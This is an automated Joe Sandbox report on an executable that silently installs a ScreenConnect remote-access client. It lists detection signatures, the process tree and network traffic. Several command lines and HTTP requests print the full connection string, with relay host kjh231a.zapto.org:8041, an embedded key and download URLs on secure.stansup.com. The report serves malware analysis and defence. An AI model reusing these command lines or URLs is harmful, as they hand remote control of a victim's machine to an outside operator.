Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
96r3GgxntQ.exe

Overview

General Information

Sample name:96r3GgxntQ.exe
renamed because original name is a hash value
Original sample name:a266e99dde8b25878921f9e8447b99b877d08a13476d0b3e2d840b5d296feb0f.exe
Analysis ID:1542316
MD5:1d59c17159ad086256e0c1c2c34666ae
SHA1:aaf33cf2f9e970a41535a556dc507e667288ac82
SHA256:a266e99dde8b25878921f9e8447b99b877d08a13476d0b3e2d840b5d296feb0f
Tags:exesecure-stansup-comuser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score:66
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:20
Range:0 - 100

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Deletes keys which are related to windows safe boot (disables safe mode boot)
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

Process Tree

  • System is w10x64
  • 96r3GgxntQ.exe (PID: 7608 cmdline: "C:\Users\user\Desktop\96r3GgxntQ.exe" MD5: 1D59C17159AD086256E0C1C2C34666AE)
    • dfsvc.exe (PID: 7652 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 3708 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" MD5: D95CC7E6F8EC5DDE28E1EFFA58E7AC8D)
        • ScreenConnect.ClientService.exe (PID: 5292 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1" MD5: 200A917996F0FC74879076354454473A)
    • WerFault.exe (PID: 7860 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7608 -s 864 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7740 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7772 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7608 -ip 7608 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7884 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 8024 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 4460 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1" MD5: 200A917996F0FC74879076354454473A)
    • ScreenConnect.WindowsClient.exe (PID: 7468 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "4e12b011-b423-4052-ba92-2560e19f3148" "User" MD5: D95CC7E6F8EC5DDE28E1EFFA58E7AC8D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000002.00000002.2257457439.00000276A42F9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          00000002.00000002.2237912718.000002768A2CB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            0000000A.00000002.1736710377.000000000242F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Process Memory Space: dfsvc.exe PID: 7652JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                Click to see the 2 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                10.0.ScreenConnect.WindowsClient.exe.a0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
                  Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.11, DestinationIsIpv6: false, DestinationPort: 49727, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 7652, Protocol: tcp, SourceIp: 79.110.49.185, SourceIsIpv6: false, SourcePort: 443
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 7740, ProcessName: svchost.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-25T19:27:31.624141+020020098971A Network Trojan was detected79.110.49.185443192.168.2.1149784TCP
                  2024-10-25T19:27:33.427540+020020098971A Network Trojan was detected79.110.49.185443192.168.2.1149796TCP
                  2024-10-25T19:27:38.892228+020020098971A Network Trojan was detected79.110.49.185443192.168.2.1149834TCP
                  2024-10-25T19:27:40.793535+020020098971A Network Trojan was detected79.110.49.185443192.168.2.1149844TCP
                  2024-10-25T19:27:42.998964+020020098971A Network Trojan was detected79.110.49.185443192.168.2.1149859TCP
                  2024-10-25T19:27:47.138118+020020098971A Network Trojan was detected79.110.49.185443192.168.2.1149880TCP
                  2024-10-25T19:27:48.713242+020020098971A Network Trojan was detected79.110.49.185443192.168.2.1149891TCP
                  2024-10-25T19:27:52.315535+020020098971A Network Trojan was detected79.110.49.185443192.168.2.1149910TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: 96r3GgxntQ.exeReversingLabs: Detection: 23%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.5% probability
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00BB1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exeJump to behavior

                  Compliance

                  barindex
                  Detected unpacking (creates a PE file in dynamic memory)
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeUnpacked PE file: 11.2.ScreenConnect.ClientService.exe.5560000.0.unpack
                  EXE planting / hijacking vulnerabilities found
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exeJump to behavior
                  Uses 32bit PE files
                  Source: 96r3GgxntQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  PE / OLE file has a valid certificate
                  Source: 96r3GgxntQ.exeStatic PE information: certificate valid
                  Uses secure TLS version for HTTPS connections
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49727 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49817 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49824 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49834 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49891 version: TLS 1.2
                  Contains modern PE file flags such as dynamic base (ASLR) or NX
                  Source: 96r3GgxntQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Binary contains paths to debug symbols
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.2237912718.000002768A21E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736567404.0000000002242000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: 96r3GgxntQ.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A06C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A4A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1734370181.0000000005562000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1782306577.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1784635687.000000001B880000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbg\ source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A717000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A21A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752617572.000000001B372000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.1730092141.00000000008AD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A717000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A21A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752617572.000000001B372000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb] source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A21E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736567404.0000000002242000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A4A1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A068000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1734596134.0000000005692000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB4A4B FindFirstFileExA,0_2_00BB4A4B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\Jump to behavior

                  Networking

                  barindex
                  Enables network access during safeboot for specific services
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry value created: NULL Service
                  Source: global trafficTCP traffic: 192.168.2.11:49944 -> 79.110.49.185:8041
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: Joe Sandbox ViewIP Address: 79.110.49.185 79.110.49.185
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49796
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49784
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49891
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49834
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49880
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49844
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49910
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49859
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
